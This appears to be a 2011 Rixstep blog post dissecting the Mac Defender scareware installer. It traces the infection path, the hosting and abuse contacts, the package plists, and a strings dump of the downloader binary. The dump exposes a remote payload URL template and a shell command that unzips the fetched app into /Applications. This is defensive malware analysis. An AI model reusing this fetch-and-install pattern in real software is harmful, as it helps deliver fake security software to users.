Rixstep

Inside Mac Defender

The new version. Part one.


Nobody wants you to see it.

They give you big eye candy pictures of it in action but they don't want to tell you what's inside or how it actually works.

We were surfing at Google images and looking - unbelievably enough - for silly pictures of swimming goggles. We tried searching for 'swimming goggles clipart' as that suggestion came up.

And we opted for 'large' images. We saw a pic that didn't fit in, found it intriguing, and clicked.

Here's the picture.



But with JavaScript on, the usual thing happens. [Clue #1: don't use JavaScript at Google images until they get control of the situation, if ever. More below.]

So yes, we got a JavaScript alert panel like everyone else, and the panel's title announced the sender as a bare IP address. [Clue #2: legitimate services don't announce themselves by IP address. And had it really come from Google (which of course it had not) it would have looked a lot different.]

The Safari browser window turned into some sort of Finder display. We don't use Finder (and haven't in years) but even so: you don't get Finder in a browser, and only an eejit wouldn't raise an eyebrow.

[Clue #3: don't get scared. That's what they want. You start thinking stupid when you're scared and this ruse is really really stupid.]



The site this ruse came from is akmalsiddiqui.com. Here's what their home page looks like at the present. But of course there are hundreds, possibly thousands, of such sites today. And word has it they're all run by thoroughbred idiots who get their FTP hacked and don't notice anything wrong for days or weeks on end. Beware.



It doesn't really matter much who owns akmalsiddiqui.com. But someone might send them a wake-up call (as they seem to need one). As can be seen, they've performed a rudimentary install of Drupal (with the default Drupal icon) and then just left it at that for now. Good show.

The domain is registered through enom.com and protected by their 'Whois Privacy Protection Service'. The two DNS servers are ns1.ipage.com and ns2.ipage.com. It's found at IP 66.96.147.112 in a block belonging to The Endurance International Group of Burlington, Massachusetts - the same street address as ipage.com. But this is not the IP the alert panel supposedly emanated from.

That IP was 178.63.32.107 and its data is as follows.

Name:
    static.107.32.63.178.clients.your-server.de

Aliases:
    107.32.63.178.in-addr.arpa

Addresses:
    178.63.32.107

Address Type:
    AF_INET

178.63.32.107 comes from a block owned by Hetzner Online AG. Their abuse mailbox (abuse@hetzner.de) is in the role object in the middle of the record; note the record is marked 'Filtered', meaning ordinary e-mail attributes are stripped, so abuse-mailbox is the one to use. So if you get hit by one of these Mac Defender attacks, locate the IP range, get the abuse contact, and tell them who the eejits are who have an infected site. Just like we did.

inetnum:        178.63.32.96 - 178.63.32.111
netname:        HETZNER-RZ11
descr:          Hetzner Online AG
descr:          Datacenter 11
country:        DE
admin-c:        HOAC1-RIPE
tech-c:         HOAC1-RIPE
status:         ASSIGNED PA
mnt-by:         HOS-GUN
mnt-lower:      HOS-GUN
mnt-routes:     HOS-GUN
source:         RIPE # Filtered

role:           Hetzner Online AG - Contact Role
address:        Hetzner Online AG
address:        Stuttgarter Straße 1
address:        D-91710 Gunzenhausen
address:        Germany
phone:          +49 9831 61 00 61
fax-no:         +49 9831 61 00 62
abuse-mailbox:  abuse@hetzner.de
remarks:        *************************************************
remarks:        * For spam/abuse/security issues please contact *
remarks:        *    abuse@hetzner.de ,  not  this  address     *
remarks:        *************************************************
remarks:
remarks:        *************************************************
remarks:        *    Any questions on Peering please send to    *
remarks:        *              peering@hetzner.de               *
remarks:        *************************************************
org:            ORG-HOA1-RIPE
admin-c:        MH375-RIPE
tech-c:         GM834-RIPE
tech-c:         RB1502-RIPE
tech-c:         SK2374-RIPE
tech-c:         ND762-RIPE
tech-c:         TF2013-RIPE
tech-c:         MF1400-RIPE
nic-hdl:        HOAC1-RIPE
mnt-by:         HOS-GUN
source:         RIPE # Filtered

% Information related to '178.63.0.0/16AS24940'

route:          178.63.0.0/16
descr:          HETZNER-RZ-FKS-BLK2
origin:         AS24940
org:            ORG-HOA1-RIPE
mnt-by:         HOS-GUN
source:         RIPE # Filtered

organisation:   ORG-HOA1-RIPE
org-name:       Hetzner Online AG
org-type:       LIR
address:        Hetzner Online AG
                Attn. Martin Hetzner
                Stuttgarter Str. 1
                91710 Gunzenhausen
                GERMANY
phone:          +49 9831 610061
fax-no:         +49 9831 610062
admin-c:        DM93-RIPE
admin-c:        GM834-RIPE
admin-c:        HOAC1-RIPE
admin-c:        MH375-RIPE
admin-c:        RB1502-RIPE
admin-c:        SK2374-RIPE
admin-c:        TF2013-RIPE
admin-c:        MF1400-RIPE
mnt-ref:        HOS-GUN
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
source:         RIPE # Filtered
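The lookup above is the whole procedure: find the inetnum covering the IP, check it really covers it, and pull out abuse-mailbox rather than an admin-c handle that 'Filtered' output has stripped of its e-mail. Here it is as a script. This is an added example, not Rixstep's code; WHOIS_TEXT is trimmed from the RIPE record printed above and embedded so the script runs offline. For a live lookup feed it the output of `whois -h whois.ripe.net 178.63.32.107` instead.

```python
"""Pull the IP range and abuse contact out of a RIPE whois response.

Added example, not Rixstep's code. WHOIS_TEXT is trimmed from the RIPE
record printed above for 178.63.32.107 and embedded so the script runs
offline; in practice feed it the output of
    whois -h whois.ripe.net 178.63.32.107
"""
import ipaddress

WHOIS_TEXT = """\
% Information related to '178.63.32.96 - 178.63.32.111'

inetnum:        178.63.32.96 - 178.63.32.111
netname:        HETZNER-RZ11
descr:          Hetzner Online AG
descr:          Datacenter 11
country:        DE
admin-c:        HOAC1-RIPE
source:         RIPE # Filtered

role:           Hetzner Online AG - Contact Role
address:        Hetzner Online AG
address:        Stuttgarter Straße 1
abuse-mailbox:  abuse@hetzner.de
remarks:        * For spam/abuse/security issues please contact *
remarks:        *    abuse@hetzner.de ,  not  this  address     *
nic-hdl:        HOAC1-RIPE
source:         RIPE # Filtered

route:          178.63.0.0/16
descr:          HETZNER-RZ-FKS-BLK2
origin:         AS24940
source:         RIPE # Filtered
"""


def parse_whois_objects(text):
    """Split a whois reply into objects: lists of (attribute, value) pairs.

    Objects are separated by blank lines; '%' lines are server comments;
    a line starting with whitespace continues the previous value.
    """
    objects, current = [], []
    for line in text.splitlines():
        if not line.strip():
            if current:
                objects.append(current)
                current = []
            continue
        if line.startswith("%"):
            continue
        if line[0].isspace() and current:
            attr, value = current[-1]
            current[-1] = (attr, value + " " + line.strip())
            continue
        attr, _, value = line.partition(":")
        current.append((attr.strip(), value.strip()))
    if current:
        objects.append(current)
    return objects


def abuse_report(ip, text):
    """Return the inetnum, netname, origin AS and abuse mailbox covering ip.

    'RIPE # Filtered' replies strip ordinary e-mail attributes, so
    abuse-mailbox is the address to report to, not the role's admin-c.
    in_range is False when the reply's inetnum does not actually cover ip,
    a sanity check before you fire off a complaint.
    """
    addr = ipaddress.ip_address(ip)
    report = {"ip": ip, "inetnum": None, "netname": None, "origin": None,
              "abuse_mailbox": None, "in_range": False}
    for obj in parse_whois_objects(text):
        attrs = {}
        for attr, value in obj:
            attrs.setdefault(attr, value)   # keep the first of repeated attributes
        if "inetnum" in attrs:
            report["inetnum"] = attrs["inetnum"]
            report["netname"] = attrs.get("netname")
            lo, hi = (ipaddress.ip_address(p.strip()) for p in attrs["inetnum"].split("-"))
            report["in_range"] = lo <= addr <= hi
        if "route" in attrs:
            report["origin"] = attrs.get("origin")
        if "abuse-mailbox" in attrs:
            report["abuse_mailbox"] = attrs["abuse-mailbox"]
    return report


if __name__ == "__main__":
    for attr, value in abuse_report("178.63.32.107", WHOIS_TEXT).items():
        print(f"{attr:14} {value}")
```

The in_range check matters more than it looks: whois servers answer with the most specific object they have, and a mistyped IP or a reassigned block will happily return a record for somebody else's range.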

Inside

The first payload (the first part) came in a ZIP file of 42453 bytes called 'anti-malware.zip'. Things like this can't go any further unless Safari's 'Open "safe" files after downloading' is on - the setting Apple's UE engineers won't budge from (whatever 'safe' is supposed to mean). Because you just don't have that on. Got it?

Anyway: this one (but maybe not the next one) is called 'mcshdr.pkg'. It's a bundle-style package - just a directory - so it's easy to look inside if you have better than Apple's daycare tools.

15 items, 109021 bytes, 296 blocks, 0 bytes in extended attributes.

mcshdr.pkg/Contents
mcshdr.pkg/Contents/Archive.bom
mcshdr.pkg/Contents/Archive.pax.gz
mcshdr.pkg/Contents/Info.plist
mcshdr.pkg/Contents/PkgInfo
mcshdr.pkg/Contents/Resources
mcshdr.pkg/Contents/Resources/Archive.sizes
mcshdr.pkg/Contents/Resources/Description.plist
mcshdr.pkg/Contents/Resources/mcshdr.bom
mcshdr.pkg/Contents/Resources/mcshdr.info
mcshdr.pkg/Contents/Resources/mcshdr.pax.gz
mcshdr.pkg/Contents/Resources/mcshdr.post_install
mcshdr.pkg/Contents/Resources/mcshdr.sizes
mcshdr.pkg/Contents/Resources/package_version
mcshdr.pkg/Contents/Resources/postinstall

[Note: if you do find a copy of Mac Defender and you want to play around with it, rename the top level PKG directory so you don't accidentally double-click it or something. Then you're relatively safe.]

Info.plist

This file reveals a lot.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>CFBundleDevelopmentRegion</key>
    <string>English</string>
    <key>CFBundleIdentifier</key>
    <string>net.abv</string>
    <key>CFBundleName</key>
    <string>Install program</string>
    <key>CFBundleShortVersionString</key>
    <string>2.4</string>
    <key>IFMajorVersion</key>
    <integer>2</integer>
    <key>IFMinorVersion</key>
    <integer>2</integer>
    <key>IFPkgBuildDate</key>
    <date>2011-06-10T11:54:01Z</date>
    <key>IFPkgBuildVersion</key>
    <string>10J869</string>
    <key>IFPkgCreator</key>
    <string>PkgCreator</string>
    <key>IFPkgFlagAllowBackRev</key>
    <false/>
    <key>IFPkgFlagAuthorizationAction</key>
    <string>NoAuthorization</string>
    <key>IFPkgFlagDefaultLocation</key>
    <string>/Applications</string>
    <key>IFPkgFlagFollowLinks</key>
    <false/>
    <key>IFPkgFlagInstalledSize</key>
    <integer>96</integer>
    <key>IFPkgFlagIsRequired</key>
    <false/>
    <key>IFPkgFlagOverwritePermissions</key>
    <false/>
    <key>IFPkgFlagRelocatable</key>
    <false/>
    <key>IFPkgFlagRestartAction</key>
    <string>NoRestart</string>
    <key>IFPkgFlagRootVolumeOnly</key>
    <false/>
    <key>IFPkgFlagUpdateInstalledLanguages</key>
    <false/>
    <key>IFPkgFormatVersion</key>
    <real>0.10000000149011611</real>
</dict>
</plist>

This build calls itself version 2.4 (CFBundleShortVersionString) while IFMajorVersion and IFMinorVersion say 2.2, and it was built only today (if that means anything - and of course the AV companies would tell you it meant a lot).

<key>IFPkgBuildDate</key>
<date>2011-06-10T11:54:01Z</date>

It's also apparent this is a new version as it doesn't require authorisation.

<key>IFPkgFlagAuthorizationAction</key>
<string>NoAuthorization</string>

It also wants to install in /Applications and doesn't want you putting it anywhere else. (Why becomes clear later.)

<key>IFPkgFlagDefaultLocation</key>
<string>/Applications</string>

<key>IFPkgFlagRelocatable</key>
<false/>

It doesn't require a restart.

<key>IFPkgFlagRestartAction</key>
<string>NoRestart</string>

And so forth. The important thing here is it doesn't need an admin password to proceed. Whether it ends up with root access is another matter - there's a way to hijack a sneaky hack Apple introduced recently, and we'll come back to that.

Archive.pax.gz

This one's easy enough to open up. There's something called 'mcshdr.app' inside.

mcshdr.app

mcshdr.app's Info.plist looks like this.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>BuildMachineOSBuild</key>
    <string>10J869</string>
    <key>CFBundleDevelopmentRegion</key>
    <string>English</string>
    <key>CFBundleExecutable</key>
    <string>mcshdr</string>
    <key>CFBundleIdentifier</key>
    <string>net.mcghg</string>
    <key>CFBundleInfoDictionaryVersion</key>
    <string>7.0</string>
    <key>CFBundleName</key>
    <string>mcshdr</string>
    <key>CFBundlePackageType</key>
    <string>APPL</string>
    <key>CFBundleShortVersionString</key>
    <string>1.0</string>
    <key>CFBundleSignature</key>
    <string>????</string>
    <key>CFBundleVersion</key>
    <string>1</string>
    <key>DTCompiler</key>
    <string>com.apple.compilers.llvm.clang.1_0</string>
    <key>DTPlatformBuild</key>
    <string>10M2518</string>
    <key>DTPlatformVersion</key>
    <string>PG</string>
    <key>DTSDKBuild</key>
    <string>9L31a</string>
    <key>DTSDKName</key>
    <string>macosx10.5</string>
    <key>DTXcode</key>
    <string>0400</string>
    <key>DTXcodeBuild</key>
    <string>10M2518</string>
    <key>LSMinimumSystemVersion</key>
    <string>10.5</string>
    <key>NSMainNibFile</key>
    <string>MainMenu</string>
    <key>NSPrincipalClass</key>
    <string>NSApplication</string>
</dict>
</plist>

The executable is small - 43796 bytes. It's Intel only: i386 and x86_64 slices, no PowerPC.

file *
mcshdr: Mach-O universal binary with 2 architectures
mcshdr (for architecture x86_64):	Mach-O 64-bit executable x86_64
mcshdr (for architecture i386):	Mach-O executable i386

There's a less than great 48x48 PNG image inside: DownloadPict.png.



MainMenu.nib, located in English.lproj, is a new type of NIB. Contrary to popular opinion, it is possible to open these NIBs sans the helper files. This is what you see for mcshdr.app's MainMenu.nib in Interface Builder.

You can test run the NIB too. And then you'll see this. (The download image goes on the left at runtime.)

Not really top drawer. [Apple would do better and this is posing as an Apple product. Sorry.]

InfoPlist.strings, Localizable.strings

InfoPlist.strings is an empty template file and it's only there because the hackers aren't that versed on the platform and/or are a little sloppy and/or just don't give a damn.

Localizable.strings has only the following. It goes into the window when the app runs. Again: it's not too 'professional'.

"WndTitle" = "Software download";
"ProgressStr" = "%d%% loaded ...";

mcshdr.xstrings

It's here we begin to see what the bastard's up to. This was of course extracted with Xstrings. A lot of this looks like pure gibberish but it's not.

0000000000001028 __PAGEZERO
0000000000001070 __TEXT
00000000000010b0 __text
00000000000010c0 __TEXT
0000000000001100 __symbol_stub1
0000000000001110 __TEXT
0000000000001150 __cstring
0000000000001160 __TEXT
00000000000011a0 __const
00000000000011b0 __TEXT
00000000000011f0 __stub_helper
0000000000001200 __TEXT
0000000000001240 __unwind_info
0000000000001250 __TEXT
0000000000001290 __eh_frame
00000000000012a0 __TEXT
00000000000012e8 __DATA
0000000000001328 __dyld
0000000000001338 __DATA
0000000000001378 __nl_symbol_ptr
0000000000001388 __DATA
00000000000013c8 __la_symbol_ptr
00000000000013d8 __DATA
0000000000001418 __cfstring
0000000000001428 __DATA
0000000000001468 __objc_data
0000000000001478 __DATA
00000000000014b8 __objc_msgrefs
00000000000014c8 __DATA
0000000000001508 __objc_selrefs
0000000000001518 __DATA
0000000000001558 __objc_classrefs__DATA
00000000000015a8 __objc_const
00000000000015b8 __DATA
00000000000015f8 __objc_classlist__DATA
0000000000001648 __objc_imageinfo__DATA
0000000000001698 __data
00000000000016a8 __DATA
00000000000016e8 __bss
00000000000016f8 __DATA
0000000000001740 __LINKEDIT
0000000000001824 /usr/lib/dyld
0000000000001920 /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
0000000000001978 /usr/lib/libstdc++.6.dylib
00000000000019b0 /usr/lib/libgcc_s.1.dylib
00000000000019e8 /usr/lib/libSystem.B.dylib
0000000000001a20 /usr/lib/libobjc.A.dylib
0000000000001a58 /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
0000000000001ac0 /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
0000000000001b30 /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
0000000000001b90 /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
0000000000001d74 AVSH
0000000000001daf 0[A^]
0000000000001e10 [A^]
0000000000001ebd [A^]
0000000000001ed2 AWAVAUATSH
000000000000208b [A\A]A^A_]
00000000000020b9 AWAVSH
0000000000002180 [A^A_]
00000000000021d5 [A^A_]A
00000000000021e2 AWAVATS1
00000000000022ab [A\A^A_]
000000000000230e AVSH
00000000000023fe [A^]
000000000000240b AWAVATSH
00000000000024e0 [A\A^A_]
0000000000002540 InstallerAppDelegate
0000000000002555 applicationDidFinishLaunching:
0000000000002574 @16@0:8
000000000000257c setWindow:
0000000000002587 @"NSWindow"
0000000000002593 T@"NSWindow",Vwindow
00000000000025a8 OnWndAppearing
00000000000025b7 cStringUsingEncoding:
00000000000025cd stringWithCString:encoding:
00000000000025e9 mainBundle
00000000000025f4 pathForResource:ofType:
000000000000260c componentsSeparatedByString:
0000000000002629 objectAtIndex:
0000000000002638 stringWithFormat:
000000000000264a window
0000000000002651 alphaValue
000000000000265c setAlphaValue:
000000000000266b invalidate
0000000000002676 startDownloadingURL:
000000000000268b URLWithString:
000000000000269a requestWithURL:cachePolicy:timeoutInterval:
00000000000026c6 alloc
00000000000026cc initWithRequest:delegate:
00000000000026e6 setDestination:allowOverwrite:
0000000000002705 bundlePath
0000000000002710 defaultManager
000000000000271f removeItemAtPath:error:
0000000000002737 terminate:
0000000000002742 release
000000000000274a setIntValue:
0000000000002757 sharedWorkspace
0000000000002767 launchApplication:
000000000000277a retain
0000000000002781 setDownloadResponse:
0000000000002796 expectedContentLength
00000000000027ac localizedStringForKey:value:table:
00000000000027cf setStringValue:
00000000000027df setLevel:
00000000000027e9 orderFront:
00000000000027f5 center
00000000000027fc scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:
000000000000283e ProgressStr
000000000000284d Cannot open file
0000000000002860 getConfigParam
000000000000286f /Users/pga/SVN-Home/Projects/MAC/FAV/Src/Installer/DownloadWinCtrl.mm
00000000000028b5 nParam > -1 && nParam < 4
00000000000028d3 DownloadPict
00000000000028e2 http://%@/mac/soft.php?affid=%@
0000000000002902 app.zip
000000000000290a /Applications/%@.%@
0000000000002922 cd /Applications;unzip %@;rm -rf __MACOSX
000000000000294c m_TextProgress
000000000000295b @"NSTextField"
000000000000296a m_Progress
0000000000002975 @"NSLevelIndicator"
0000000000002989 m_timerAppear
0000000000002997 @"NSTimer"
00000000000029a2 m_downloadResponse
00000000000029b5 @"NSURLResponse"
00000000000029c6 m_bytesReceived
00000000000029d8 awakeFromNib
00000000000029e5 v16@0:8
00000000000029ed download:shouldDecodeSourceDataOfMIMEType:
0000000000002a18 c32@0:8@16@24
0000000000002a26 download:didReceiveDataOfLength:
0000000000002a47 v28@0:8@16I24
0000000000002a55 download:didReceiveResponse:
0000000000002a72 v32@0:8@16@24
0000000000002a80 v24@0:8@16
0000000000002a8b downloadDidFinish:
0000000000002a9e download:didFailWithError:
0000000000002ab9 v20@0:8c16
0000000000002ac4 DownloadWinCtrl
0000000000004001 @__ZdaPv
000000000000400e @__Znam
0000000000004018 @dyld_stub_binder
000000000000402e @__objc_empty_cache
0000000000004049 @__objc_empty_vtable
0000000000004065 @_objc_msgSend_fixup
0000000000004081 @_OBJC_CLASS_$_NSObject
000000000000409d @_OBJC_CLASS_$_NSTimer
00000000000040b8 @_OBJC_METACLASS_$_NSObject
00000000000040da @___CFConstantStringClassReference
0000000000004105 @_OBJC_CLASS_$_NSBundle
0000000000004121 @_OBJC_CLASS_$_NSFileManager
0000000000004141 @_OBJC_CLASS_$_NSString
000000000000415d @_OBJC_CLASS_$_NSURL
0000000000004175 @_OBJC_CLASS_$_NSURLDownload
0000000000004193 @_OBJC_CLASS_$_NSURLRequest
00000000000041b4 @_NSApp
00000000000041bf @_OBJC_CLASS_$_NSWindowController
00000000000041e5 @_OBJC_CLASS_$_NSWorkspace
0000000000004204 @_OBJC_METACLASS_$_NSWindowController
0000000000004230 @__ZdaPv
000000000000423d @__Znam
000000000000424b @_CGWindowLevelForKey
0000000000004266 @_NSApplicationMain
000000000000427f @_NSLog
000000000000428c @___assert_rtn
00000000000042a1 @_exit
00000000000042ae @_fclose
00000000000042bd @_fopen
00000000000042cb @_fread
00000000000042d9 @_fseek
00000000000042e7 @_memset
00000000000042f6 @_strlen
0000000000004305 @_system
0000000000004315 start
0000000000004320 !environ
0000000000004329 ONXArg
0000000000004333 mh_execute_header
0000000000004345 A_progname
0000000000004a42 dyld_stub_binding_helper
0000000000004a5b _main
0000000000004a61 -[InstallerAppDelegate applicationDidFinishLaunching:]
0000000000004a98 -[InstallerAppDelegate window]
0000000000004ab7 -[InstallerAppDelegate setWindow:]
0000000000004ada -[DownloadWinCtrl OnWndAppearing]
0000000000004afc -[DownloadWinCtrl setDownloadResponse:]
0000000000004b24 -[DownloadWinCtrl download:didReceiveResponse:]
0000000000004b54 -[DownloadWinCtrl download:didReceiveDataOfLength:]
0000000000004b88 -[DownloadWinCtrl download:shouldDecodeSourceDataOfMIMEType:]
0000000000004bc6 __ZL14getConfigParami
0000000000004bdc -[DownloadWinCtrl startDownloadingURL:]
0000000000004c04 __ZL13deleteAndExitv
0000000000004c19 -[DownloadWinCtrl download:didFailWithError:]
0000000000004c47 -[DownloadWinCtrl downloadDidFinish:]
0000000000004c6d -[DownloadWinCtrl awakeFromNib]
0000000000004c8d __ZZL14getConfigParamiE8__func__
0000000000004cae  stub helpers
0000000000004cbc _OBJC_METACLASS_$_InstallerAppDelegate
0000000000004ce3 _OBJC_CLASS_$_InstallerAppDelegate
0000000000004d06 _OBJC_METACLASS_$_DownloadWinCtrl
0000000000004d28 _OBJC_CLASS_$_DownloadWinCtrl
0000000000004d46 _OBJC_IVAR_$_InstallerAppDelegate.window
0000000000004d6f _OBJC_IVAR_$_DownloadWinCtrl.m_timerAppear
0000000000004d9a _OBJC_IVAR_$_DownloadWinCtrl.m_downloadResponse
0000000000004dca _OBJC_IVAR_$_DownloadWinCtrl.m_bytesReceived
0000000000004df7 _OBJC_IVAR_$_DownloadWinCtrl.m_Progress
0000000000004e1f _OBJC_IVAR_$_DownloadWinCtrl.m_TextProgress
0000000000004e4b __ZZ45-[DownloadWinCtrl download:didFailWithError:]E12s_nFailedCnt
0000000000004e8e _NXArgc
0000000000004e96 _NXArgv
0000000000004e9e ___progname
0000000000004eaa __mh_execute_header
0000000000004ebe _environ
0000000000004ec7 start
0000000000004ecd _CGWindowLevelForKey
0000000000004ee2 _NSApp
0000000000004ee9 _NSApplicationMain
0000000000004efc _NSLog
0000000000004f03 _OBJC_CLASS_$_NSBundle
0000000000004f1a _OBJC_CLASS_$_NSFileManager
0000000000004f36 _OBJC_CLASS_$_NSObject
0000000000004f4d _OBJC_CLASS_$_NSString
0000000000004f64 _OBJC_CLASS_$_NSTimer
0000000000004f7a _OBJC_CLASS_$_NSURL
0000000000004f8e _OBJC_CLASS_$_NSURLDownload
0000000000004faa _OBJC_CLASS_$_NSURLRequest
0000000000004fc5 _OBJC_CLASS_$_NSWindowController
0000000000004fe6 _OBJC_CLASS_$_NSWorkspace
0000000000005000 _OBJC_METACLASS_$_NSObject
000000000000501b _OBJC_METACLASS_$_NSWindowController
0000000000005040 __ZdaPv
0000000000005048 __Znam
000000000000504f ___CFConstantStringClassReference
0000000000005071 ___assert_rtn
000000000000507f __objc_empty_cache
0000000000005092 __objc_empty_vtable
00000000000050a6 _exit
00000000000050ac _fclose
00000000000050b4 _fopen
00000000000050bb _fread
00000000000050c2 _fseek
00000000000050c9 _memset
00000000000050d1 _objc_msgSend_fixup
00000000000050e5 _strlen
00000000000050ed _system
00000000000050f5 dyld_stub_binder
0000000000006024 __PAGEZERO
000000000000605c __TEXT
000000000000608c __text
000000000000609c __TEXT
00000000000060d0 __cstring
00000000000060e0 __TEXT
0000000000006114 __const
0000000000006124 __TEXT
0000000000006158 __symbol_stub
0000000000006168 __TEXT
000000000000619c __stub_helper
00000000000061ac __TEXT
00000000000061e0 __unwind_info
00000000000061f0 __TEXT
0000000000006224 __eh_frame
0000000000006234 __TEXT
0000000000006270 __DATA
00000000000062a0 __dyld
00000000000062b0 __DATA
00000000000062e4 __nl_symbol_ptr
00000000000062f4 __DATA
0000000000006328 __la_symbol_ptr
0000000000006338 __DATA
000000000000636c __cfstring
000000000000637c __DATA
00000000000063b0 __data
00000000000063c0 __DATA
00000000000063f4 __bss
0000000000006404 __DATA
0000000000006440 __OBJC
0000000000006470 __module_info
0000000000006480 __OBJC
00000000000064b4 __meta_class
00000000000064c4 __OBJC
00000000000064f8 __instance_vars
0000000000006508 __OBJC
000000000000653c __inst_meth
000000000000654c __OBJC
0000000000006580 __property
0000000000006590 __OBJC
00000000000065c4 __class_ext
00000000000065d4 __OBJC
0000000000006608 __class
0000000000006618 __OBJC
000000000000664c __symbols
000000000000665c __OBJC
0000000000006690 __message_refs
00000000000066a0 __OBJC
00000000000066d4 __cls_refs
00000000000066e4 __OBJC
0000000000006718 __image_info
0000000000006728 __OBJC
0000000000006764 __LINKEDIT
0000000000006838 /usr/lib/dyld
0000000000006857 ;PB;+y
00000000000068c8 /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
000000000000691c /usr/lib/libstdc++.6.dylib
0000000000006950 /usr/lib/libgcc_s.1.dylib
0000000000006984 /usr/lib/libSystem.B.dylib
00000000000069b8 /usr/lib/libobjc.A.dylib
00000000000069ec /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
0000000000006a54 /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
0000000000006ac4 /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
0000000000006b24 /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
0000000000006ce7 ^_[]
0000000000006e1e ,^_[]
0000000000006ee4  ^_]
000000000000709a 1ZAHu
00000000000070fb ,^_[]
0000000000007270 ^_[]
000000000000737a ^_[]
000000000000750e ^_[]
0000000000007626 ,^_[]
000000000000762c applicationDidFinishLaunching:
000000000000764b window
0000000000007652 @8@0:4
0000000000007659 setWindow:
0000000000007664 InstallerAppDelegate
0000000000007679 @"NSWindow"
0000000000007685 T@"NSWindow",Vwindow
000000000000769c scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:
00000000000076dd OnWndAppearing
00000000000076ec center
00000000000076f3 orderFront:
00000000000076ff setLevel:
0000000000007709 setStringValue:
0000000000007719 localizedStringForKey:value:table:
000000000000773c expectedContentLength
0000000000007752 setDownloadResponse:
0000000000007767 retain
000000000000776e launchApplication:
0000000000007781 sharedWorkspace
0000000000007791 setIntValue:
000000000000779e release
00000000000077a6 terminate:
00000000000077b1 removeItemAtPath:error:
00000000000077c9 defaultManager
00000000000077d8 bundlePath
00000000000077e3 setDestination:allowOverwrite:
0000000000007802 initWithRequest:delegate:
000000000000781c alloc
0000000000007822 requestWithURL:cachePolicy:timeoutInterval:
000000000000784e URLWithString:
000000000000785d startDownloadingURL:
0000000000007872 invalidate
000000000000787d setAlphaValue:
000000000000788c alphaValue
000000000000789a stringWithFormat:
00000000000078ac objectAtIndex:
00000000000078bb componentsSeparatedByString:
00000000000078d8 pathForResource:ofType:
00000000000078f0 mainBundle
00000000000078fb stringWithCString:encoding:
0000000000007917 cStringUsingEncoding:
000000000000792d NSString
0000000000007936 NSBundle
000000000000793f NSURLRequest
000000000000794c NSURL
0000000000007952 NSURLDownload
0000000000007960 NSFileManager
000000000000796e NSWorkspace
000000000000797a NSTimer
0000000000007983 ProgressStr
0000000000007992 Cannot open file
00000000000079a4 getConfigParam
00000000000079b3 /Users/pga/SVN-Home/Projects/MAC/FAV/Src/Installer/DownloadWinCtrl.mm
00000000000079f9 nParam > -1 && nParam < 4
0000000000007a17 DownloadPict
0000000000007a26 http://%@/mac/soft.php?affid=%@
0000000000007a46 app.zip
0000000000007a4e /Applications/%@.%@
0000000000007a66 cd /Applications;unzip %@;rm -rf __MACOSX
0000000000007a90 NSObject
0000000000007a99 NSWindowController
0000000000007aac DownloadWinCtrl
0000000000007abc m_TextProgress
0000000000007acb @"NSTextField"
0000000000007ada m_Progress
0000000000007ae5 @"NSLevelIndicator"
0000000000007af9 m_timerAppear
0000000000007b07 @"NSTimer"
0000000000007b12 m_downloadResponse
0000000000007b25 @"NSURLResponse"
0000000000007b36 m_bytesReceived
0000000000007b48 awakeFromNib
0000000000007b55 v8@0:4
0000000000007b5c download:shouldDecodeSourceDataOfMIMEType:
0000000000007b87 c16@0:4@8@12
0000000000007b94 download:didReceiveDataOfLength:
0000000000007bb5 v16@0:4@8I12
0000000000007bc2 download:didReceiveResponse:
0000000000007bdf v16@0:4@8@12
0000000000007bec v12@0:4@8
0000000000007bf6 downloadDidFinish:
0000000000007c09 download:didFailWithError:
0000000000007c24 v12@0:4c8
000000000000a001 @__ZdaPv
000000000000a00e @__Znam
000000000000a018 @dyld_stub_binder
000000000000a02e @___CFConstantStringClassReference
000000000000a058 @_NSApp
000000000000a064 @__ZdaPv
000000000000a071 @__Znam
000000000000a07f @_CGWindowLevelForKey
000000000000a09a @_NSApplicationMain
000000000000a0b3 @_NSLog
000000000000a0c0 @___assert_rtn
000000000000a0d4 @_exit
000000000000a0e0 @_fclose
000000000000a0ee @_fopen
000000000000a0fb @_fread
000000000000a108 @_fseek
000000000000a115 @_memset
000000000000a123 @_objc_msgSend
000000000000a137 @_objc_msgSend_fpret
000000000000a151 @_strlen
000000000000a15f @_system$UNIX2003
000000000000a179 start
000000000000a17f X.objc_class_name_
000000000000a197 4environ
000000000000a1a0 bNXArg
000000000000a1aa mh_execute_header
000000000000a1bc T_progname
000000000000a1ef InstallerAppDelegate
000000000000a206 DownloadWinCtrl
000000000000a5b6 dyld_stub_binding_helper
000000000000a5cf _main
000000000000a5d5 -[InstallerAppDelegate applicationDidFinishLaunching:]
000000000000a60c -[InstallerAppDelegate window]
000000000000a62b -[InstallerAppDelegate setWindow:]
000000000000a64e -[DownloadWinCtrl download:shouldDecodeSourceDataOfMIMEType:]
000000000000a68c -[DownloadWinCtrl setDownloadResponse:]
000000000000a6b4 -[DownloadWinCtrl download:didReceiveResponse:]
000000000000a6e4 -[DownloadWinCtrl download:didReceiveDataOfLength:]
000000000000a718 -[DownloadWinCtrl OnWndAppearing]
000000000000a73a __ZL14getConfigParami
000000000000a750 -[DownloadWinCtrl startDownloadingURL:]
000000000000a778 __ZL13deleteAndExitv
000000000000a78d -[DownloadWinCtrl download:didFailWithError:]
000000000000a7bb -[DownloadWinCtrl downloadDidFinish:]
000000000000a7e1 -[DownloadWinCtrl awakeFromNib]
